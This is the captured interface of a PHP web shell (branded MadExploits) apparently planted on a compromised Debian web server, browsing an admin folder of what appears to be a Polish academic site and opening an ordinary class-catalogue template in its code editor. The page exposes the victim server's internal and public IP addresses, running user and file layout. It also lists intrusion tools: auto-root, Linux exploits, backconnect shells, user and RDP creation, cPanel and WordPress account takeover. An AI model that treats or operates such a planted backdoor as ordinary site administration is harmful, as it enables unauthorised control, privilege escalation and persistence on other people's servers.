Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.149.29.190
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web.back /
protected /
Pages /
Admin /
[ HOME SHELL ]
Name
Size
Permission
Action
ClassCatalog.page
18.95
KB
-rw-r--r--
ClassCatalog.php
16.13
KB
-rw-r--r--
ClassMaterials.page
2.26
KB
-rw-r--r--
ClassMaterials.php
4.73
KB
-rw-r--r--
ClassSchedule.page
1.58
KB
-rw-r--r--
ClassSchedule.php
1.26
KB
-rw-r--r--
ClassScheduleBlockEdit.page
2.7
KB
-rw-r--r--
ClassScheduleBlockEdit.php
7.7
KB
-rw-r--r--
ContentBrowse.page
1.41
KB
-rw-r--r--
ContentBrowse.php
3.96
KB
-rw-r--r--
GlobalDutiesList.page
3.25
KB
-rw-r--r--
GlobalDutiesList.php
3.21
KB
-rw-r--r--
GlobalPapersEdit.page
3.43
KB
-rw-r--r--
GlobalPapersList.php
1.37
KB
-rw-r--r--
Home.page
43
B
-rw-r--r--
Login.page
670
B
-rw-r--r--
Login.php
446
B
-rw-r--r--
NewsItemEdit.page
3.05
KB
-rw-r--r--
NewsItemEdit.php
2.25
KB
-rw-r--r--
NewsItemImageEdit.page
1.49
KB
-rw-r--r--
NewsItemImageEdit.php
3.97
KB
-rw-r--r--
NewsItems.page
2.08
KB
-rw-r--r--
NewsItems.php
1.46
KB
-rw-r--r--
PaperCoverEdit.page
1.47
KB
-rw-r--r--
PaperCoverEdit.php
4.08
KB
-rw-r--r--
PapersEdit.page
4.31
KB
-rw-r--r--
PapersEdit.php
12.41
KB
-rw-r--r--
PasswordChange.page
511
B
-rw-r--r--
PasswordChange.php
1.16
KB
-rw-r--r--
UserBrowse.page
3.46
KB
-rw-r--r--
UserBrowse.php
2.79
KB
-rw-r--r--
UserCreate.page
1.86
KB
-rw-r--r--
UserCreate.php
1.51
KB
-rw-r--r--
UserEdit.page
10.97
KB
-rw-r--r--
UserEdit.php
11.55
KB
-rw-r--r--
UserPapers.page
3.63
KB
-rw-r--r--
UserPapers.php
1.74
KB
-rw-r--r--
UserPhotoEdit.page
1.5
KB
-rw-r--r--
UserPhotoEdit.php
3.96
KB
-rw-r--r--
config.xml
227
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ClassCatalog.page
<com:TContent ID="content"> <h1>Katalog zajęć</h1> <com:TTabPanel> <com:TTabView Caption="<%= KClass::$_group_names[KClass::GROUP_1ST_YEAR] %>"> <com:TButton OnClick="Page.class_Irok_Create" Text="Dodaj nową pozycję"/> <com:TDataList ID="class_Irok_List" RepeatLayout="Raw" DataKeyField="id"> <prop:ItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; height: 50px; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px;' onMouseOver="style.backgroundColor='#E3ECF7'; $('<%=$this->class_Irok_Controls->getClientId()%>').show()" onMouseOut="style.backgroundColor='white'; $('<%=$this->class_Irok_Controls->getClientId()%>').hide()"> <div style='float:left'> <b><%= $this->Data->name %></b> </div> <com:TPanel ID='class_Irok_Controls' Style.CustomStyle='float:right; display:none'> <com:TButton Text='E' OnClick="Page.class_Irok_Edit"/> <com:TButton Text='U' OnClick="Page.class_Irok_Delete" Attributes.onClick="if (!confirm('Jesteś pewny? TEJ OPERACJI NIE MOŻNA COFNĄĆ!')) return false;"/> </com:TPanel> </div> </prop:ItemTemplate> <prop:EditItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px; background-color: #FFF1C2'> <com:TTextBox ID="class_Irok_Name" Width="90%" Text="<%= $this->Data->name %>"/><br/> <com:TPanel> <com:TButton Text="Zapisz" OnClick="Page.class_Irok_Update"/> <com:TButton Text="Anuluj" OnClick="Page.class_Irok_EditCancel" /> </com:TPanel> </div> </prop:EditItemTemplate> <prop:SelectedItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px; background-color: #FFF1C2'> <com:TTextBox ID="class_Irok_Name" Width="90%" Text="<%= $this->Data->name %>"/><br/> <com:TPanel> <com:TButton Text="Zapisz" OnClick="Page.class_Irok_Update"/> <com:TButton Text="Anuluj" OnClick="Page.class_Irok_Delete"/> </com:TPanel> </div> </prop:SelectedItemTemplate> </com:TDataList> <br clear='both'/> </com:TTabView> <com:TTabView Caption="<%= KClass::$_group_names[KClass::GROUP_2ND_YEAR] %>"> <com:TButton OnClick="Page.class_IIrok_Create" Text="Dodaj nową pozycję"/> <com:TDataList ID="class_IIrok_List" RepeatLayout="Raw" DataKeyField="id"> <prop:ItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; height: 50px; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px;' onMouseOver="style.backgroundColor='#E3ECF7'; $('<%=$this->class_IIrok_Controls->getClientId()%>').show()" onMouseOut="style.backgroundColor='white'; $('<%=$this->class_IIrok_Controls->getClientId()%>').hide()"> <div style='float:left'> <b><%= $this->Data->name %></b> </div> <com:TPanel ID='class_IIrok_Controls' Style.CustomStyle='float:right; display:none'> <com:TButton Text='E' OnClick="Page.class_IIrok_Edit"/> <com:TButton Text='U' OnClick="Page.class_IIrok_Delete" Attributes.onClick="if (!confirm('Jesteś pewny? TEJ OPERACJI NIE MOŻNA COFNĄĆ!')) return false;"/> </com:TPanel> </div> </prop:ItemTemplate> <prop:EditItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px; background-color: #FFF1C2'> <com:TTextBox ID="class_IIrok_Name" Width="90%" Text="<%= $this->Data->name %>"/><br/> <com:TPanel> <com:TButton Text="Zapisz" OnClick="Page.class_IIrok_Update"/> <com:TButton Text="Anuluj" OnClick="Page.class_IIrok_EditCancel" /> </com:TPanel> </div> </prop:EditItemTemplate> <prop:SelectedItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px; background-color: #FFF1C2'> <com:TTextBox ID="class_IIrok_Name" Width="90%" Text="<%= $this->Data->name %>"/><br/> <com:TPanel> <com:TButton Text="Zapisz" OnClick="Page.class_IIrok_Update"/> <com:TButton Text="Anuluj" OnClick="Page.class_IIrok_Delete"/> </com:TPanel> </div> </prop:SelectedItemTemplate> </com:TDataList> <br clear='both'/> </com:TTabView> <com:TTabView Caption="<%= KClass::$_group_names[KClass::GROUP_3RD_YEAR] %>"> <com:TButton OnClick="Page.class_IIIrok_Create" Text="Dodaj nową pozycję"/> <com:TDataList ID="class_IIIrok_List" RepeatLayout="Raw" DataKeyField="id"> <prop:ItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; height: 50px; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px;' onMouseOver="style.backgroundColor='#E3ECF7'; $('<%=$this->class_IIIrok_Controls->getClientId()%>').show()" onMouseOut="style.backgroundColor='white'; $('<%=$this->class_IIIrok_Controls->getClientId()%>').hide()"> <div style='float:left'> <b><%= $this->Data->name %></b> </div> <com:TPanel ID='class_IIIrok_Controls' Style.CustomStyle='float:right; display:none'> <com:TButton Text='E' OnClick="Page.class_IIIrok_Edit"/> <com:TButton Text='U' OnClick="Page.class_IIIrok_Delete" Attributes.onClick="if (!confirm('Jesteś pewny? TEJ OPERACJI NIE MOŻNA COFNĄĆ!')) return false;"/> </com:TPanel> </div> </prop:ItemTemplate> <prop:EditItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px; background-color: #FFF1C2'> <com:TTextBox ID="class_IIIrok_Name" Width="90%" Text="<%= $this->Data->name %>"/><br/> <com:TPanel> <com:TButton Text="Zapisz" OnClick="Page.class_IIIrok_Update"/> <com:TButton Text="Anuluj" OnClick="Page.class_IIIrok_EditCancel" /> </com:TPanel> </div> </prop:EditItemTemplate> <prop:SelectedItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px; background-color: #FFF1C2'> <com:TTextBox ID="class_IIIrok_Name" Width="90%" Text="<%= $this->Data->name %>"/><br/> <com:TPanel> <com:TButton Text="Zapisz" OnClick="Page.class_IIIrok_Update"/> <com:TButton Text="Anuluj" OnClick="Page.class_IIIrok_Delete"/> </com:TPanel> </div> </prop:SelectedItemTemplate> </com:TDataList> <br clear='both'/> </com:TTabView> <com:TTabView Caption="<%= KClass::$_group_names[KClass::GROUP_4TH_YEAR_CLASSIC] %>"> <com:TButton OnClick="Page.class_IVrok_Create" Text="Dodaj nową pozycję"/> <com:TDataList ID="class_IVrok_List" RepeatLayout="Raw" DataKeyField="id"> <prop:ItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; height: 50px; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px;' onMouseOver="style.backgroundColor='#E3ECF7'; $('<%=$this->class_IVrok_Controls->getClientId()%>').show()" onMouseOut="style.backgroundColor='white'; $('<%=$this->class_IVrok_Controls->getClientId()%>').hide()"> <div style='float:left'> <b><%= $this->Data->name %></b> </div> <com:TPanel ID='class_IVrok_Controls' Style.CustomStyle='float:right; display:none'> <com:TButton Text='E' OnClick="Page.class_IVrok_Edit"/> <com:TButton Text='U' OnClick="Page.class_IVrok_Delete" Attributes.onClick="if (!confirm('Jesteś pewny? TEJ OPERACJI NIE MOŻNA COFNĄĆ!')) return false;"/> </com:TPanel> </div> </prop:ItemTemplate> <prop:EditItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px; background-color: #FFF1C2'> <com:TTextBox ID="class_IVrok_Name" Width="90%" Text="<%= $this->Data->name %>"/><br/> <com:TPanel> <com:TButton Text="Zapisz" OnClick="Page.class_IVrok_Update"/> <com:TButton Text="Anuluj" OnClick="Page.class_IVrok_EditCancel" /> </com:TPanel> </div> </prop:EditItemTemplate> <prop:SelectedItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px; background-color: #FFF1C2'> <com:TTextBox ID="class_IVrok_Name" Width="90%" Text="<%= $this->Data->name %>"/><br/> <com:TPanel> <com:TButton Text="Zapisz" OnClick="Page.class_IVrok_Update"/> <com:TButton Text="Anuluj" OnClick="Page.class_IVrok_Delete"/> </com:TPanel> </div> </prop:SelectedItemTemplate> </com:TDataList> <br clear='both'/> </com:TTabView> <com:TTabView Caption="<%= KClass::$_group_names[KClass::GROUP_5TH_YEAR_CLASSIC] %>"> <com:TButton OnClick="Page.class_Vrok_Create" Text="Dodaj nową pozycję"/> <com:TDataList ID="class_Vrok_List" RepeatLayout="Raw" DataKeyField="id"> <prop:ItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; height: 50px; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px;' onMouseOver="style.backgroundColor='#E3ECF7'; $('<%=$this->class_Vrok_Controls->getClientId()%>').show()" onMouseOut="style.backgroundColor='white'; $('<%=$this->class_Vrok_Controls->getClientId()%>').hide()"> <div style='float:left'> <b><%= $this->Data->name %></b> </div> <com:TPanel ID='class_Vrok_Controls' Style.CustomStyle='float:right; display:none'> <com:TButton Text='E' OnClick="Page.class_Vrok_Edit"/> <com:TButton Text='U' OnClick="Page.class_Vrok_Delete" Attributes.onClick="if (!confirm('Jesteś pewny? TEJ OPERACJI NIE MOŻNA COFNĄĆ!')) return false;"/> </com:TPanel> </div> </prop:ItemTemplate> <prop:EditItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px; background-color: #FFF1C2'> <com:TTextBox ID="class_Vrok_Name" Width="90%" Text="<%= $this->Data->name %>"/><br/> <com:TPanel> <com:TButton Text="Zapisz" OnClick="Page.class_Vrok_Update"/> <com:TButton Text="Anuluj" OnClick="Page.class_Vrok_EditCancel" /> </com:TPanel> </div> </prop:EditItemTemplate> <prop:SelectedItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px; background-color: #FFF1C2'> <com:TTextBox ID="class_Vrok_Name" Width="90%" Text="<%= $this->Data->name %>"/><br/> <com:TPanel> <com:TButton Text="Zapisz" OnClick="Page.class_Vrok_Update"/> <com:TButton Text="Anuluj" OnClick="Page.class_Vrok_Delete"/> </com:TPanel> </div> </prop:SelectedItemTemplate> </com:TDataList> <br clear='both'/> </com:TTabView> <com:TTabView Caption="<%= KClass::$_group_names[KClass::GROUP_4TH_YEAR_NEOLATIN] %>"> <com:TButton OnClick="Page.class_ren_Create" Text="Dodaj nową pozycję"/> <com:TDataList ID="class_ren_List" RepeatLayout="Raw" DataKeyField="id"> <prop:ItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; height: 50px; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px;' onMouseOver="style.backgroundColor='#E3ECF7'; $('<%=$this->class_ren_Controls->getClientId()%>').show()" onMouseOut="style.backgroundColor='white'; $('<%=$this->class_ren_Controls->getClientId()%>').hide()"> <div style='float:left'> <b><%= $this->Data->name %></b> </div> <com:TPanel ID='class_ren_Controls' Style.CustomStyle='float:right; display:none'> <com:TButton Text='E' OnClick="Page.class_ren_Edit"/> <com:TButton Text='U' OnClick="Page.class_ren_Delete" Attributes.onClick="if (!confirm('Jesteś pewny? TEJ OPERACJI NIE MOŻNA COFNĄĆ!')) return false;"/> </com:TPanel> </div> </prop:ItemTemplate> <prop:EditItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px; background-color: #FFF1C2'> <com:TTextBox ID="class_ren_Name" Width="90%" Text="<%= $this->Data->name %>"/><br/> <com:TPanel> <com:TButton Text="Zapisz" OnClick="Page.class_ren_Update"/> <com:TButton Text="Anuluj" OnClick="Page.class_ren_EditCancel" /> </com:TPanel> </div> </prop:EditItemTemplate> <prop:SelectedItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px; background-color: #FFF1C2'> <com:TTextBox ID="class_ren_Name" Width="90%" Text="<%= $this->Data->name %>"/><br/> <com:TPanel> <com:TButton Text="Zapisz" OnClick="Page.class_ren_Update"/> <com:TButton Text="Anuluj" OnClick="Page.class_ren_Delete"/> </com:TPanel> </div> </prop:SelectedItemTemplate> </com:TDataList> <br clear='both'/> </com:TTabView> <com:TTabView Caption="<%= KClass::$_group_names[KClass::GROUP_5TH_YEAR_NEOLATIN] %>"> <com:TButton OnClick="Page.class_f1_Create" Text="Dodaj nową pozycję"/> <com:TDataList ID="class_f1_List" RepeatLayout="Raw" DataKeyField="id"> <prop:ItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; height: 50px; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px;' onMouseOver="style.backgroundColor='#E3ECF7'; $('<%=$this->class_f1_Controls->getClientId()%>').show()" onMouseOut="style.backgroundColor='white'; $('<%=$this->class_f1_Controls->getClientId()%>').hide()"> <div style='float:left'> <b><%= $this->Data->name %></b> </div> <com:TPanel ID='class_f1_Controls' Style.CustomStyle='float:right; display:none'> <com:TButton Text='E' OnClick="Page.class_f1_Edit"/> <com:TButton Text='U' OnClick="Page.class_f1_Delete" Attributes.onClick="if (!confirm('Jesteś pewny? TEJ OPERACJI NIE MOŻNA COFNĄĆ!')) return false;"/> </com:TPanel> </div> </prop:ItemTemplate> <prop:EditItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px; background-color: #FFF1C2'> <com:TTextBox ID="class_f1_Name" Width="90%" Text="<%= $this->Data->name %>"/><br/> <com:TPanel> <com:TButton Text="Zapisz" OnClick="Page.class_f1_Update"/> <com:TButton Text="Anuluj" OnClick="Page.class_f1_EditCancel" /> </com:TPanel> </div> </prop:EditItemTemplate> <prop:SelectedItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px; background-color: #FFF1C2'> <com:TTextBox ID="class_f1_Name" Width="90%" Text="<%= $this->Data->name %>"/><br/> <com:TPanel> <com:TButton Text="Zapisz" OnClick="Page.class_f1_Update"/> <com:TButton Text="Anuluj" OnClick="Page.class_f1_Delete"/> </com:TPanel> </div> </prop:SelectedItemTemplate> </com:TDataList> <br clear='both'/> </com:TTabView> <com:TTabView Caption="<%= KClass::$_group_names[KClass::GROUP_FACS] %>"> <com:TButton OnClick="Page.class_f2_Create" Text="Dodaj nową pozycję"/> <com:TDataList ID="class_f2_List" RepeatLayout="Raw" DataKeyField="id"> <prop:ItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; height: 50px; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px;' onMouseOver="style.backgroundColor='#E3ECF7'; $('<%=$this->class_f2_Controls->getClientId()%>').show()" onMouseOut="style.backgroundColor='white'; $('<%=$this->class_f2_Controls->getClientId()%>').hide()"> <div style='float:left'> <b><%= $this->Data->name %></b> </div> <com:TPanel ID='class_f2_Controls' Style.CustomStyle='float:right; display:none'> <com:TButton Text='E' OnClick="Page.class_f2_Edit"/> <com:TButton Text='U' OnClick="Page.class_f2_Delete" Attributes.onClick="if (!confirm('Jesteś pewny? TEJ OPERACJI NIE MOŻNA COFNĄĆ!')) return false;"/> </com:TPanel> </div> </prop:ItemTemplate> <prop:EditItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px; background-color: #FFF1C2'> <com:TTextBox ID="class_f2_Name" Width="90%" Text="<%= $this->Data->name %>"/><br/> <com:TPanel> <com:TButton Text="Zapisz" OnClick="Page.class_f2_Update"/> <com:TButton Text="Anuluj" OnClick="Page.class_f2_EditCancel" /> </com:TPanel> </div> </prop:EditItemTemplate> <prop:SelectedItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px; background-color: #FFF1C2'> <com:TTextBox ID="class_f2_Name" Width="90%" Text="<%= $this->Data->name %>"/><br/> <com:TPanel> <com:TButton Text="Zapisz" OnClick="Page.class_f2_Update"/> <com:TButton Text="Anuluj" OnClick="Page.class_f2_Delete"/> </com:TPanel> </div> </prop:SelectedItemTemplate> </com:TDataList> <br clear='both'/> </com:TTabView> <com:TTabView Caption="<%= KClass::$_group_names[KClass::GROUP_DOC] %>"> <com:TButton OnClick="Page.class_doc_Create" Text="Dodaj nową pozycję"/> <com:TDataList ID="class_doc_List" RepeatLayout="Raw" DataKeyField="id"> <prop:ItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; height: 50px; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px;' onMouseOver="style.backgroundColor='#E3ECF7'; $('<%=$this->class_doc_Controls->getClientId()%>').show()" onMouseOut="style.backgroundColor='white'; $('<%=$this->class_doc_Controls->getClientId()%>').hide()"> <div style='float:left'> <b><%= $this->Data->name %></b> </div> <com:TPanel ID='class_doc_Controls' Style.CustomStyle='float:right; display:none'> <com:TButton Text='E' OnClick="Page.class_doc_Edit"/> <com:TButton Text='U' OnClick="Page.class_doc_Delete" Attributes.onClick="if (!confirm('Jesteś pewny? TEJ OPERACJI NIE MOŻNA COFNĄĆ!')) return false;"/> </com:TPanel> </div> </prop:ItemTemplate> <prop:EditItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px; background-color: #FFF1C2'> <com:TTextBox ID="class_doc_Name" Width="90%" Text="<%= $this->Data->name %>"/><br/> <com:TPanel> <com:TButton Text="Zapisz" OnClick="Page.class_doc_Update"/> <com:TButton Text="Anuluj" OnClick="Page.class_doc_EditCancel" /> </com:TPanel> </div> </prop:EditItemTemplate> <prop:SelectedItemTemplate> <div style='float:left; width: <%= $this->Page->_cell_width %>; margin: 2px; border: 1px dotted #e0e0e0; padding: 4px; background-color: #FFF1C2'> <com:TTextBox ID="class_doc_Name" Width="90%" Text="<%= $this->Data->name %>"/><br/> <com:TPanel> <com:TButton Text="Zapisz" OnClick="Page.class_doc_Update"/> <com:TButton Text="Anuluj" OnClick="Page.class_doc_Delete"/> </com:TPanel> </div> </prop:SelectedItemTemplate> </com:TDataList> <br clear='both'/> </com:TTabView> </com:TTabPanel> <br clear='both'/> </com:TContent>
Close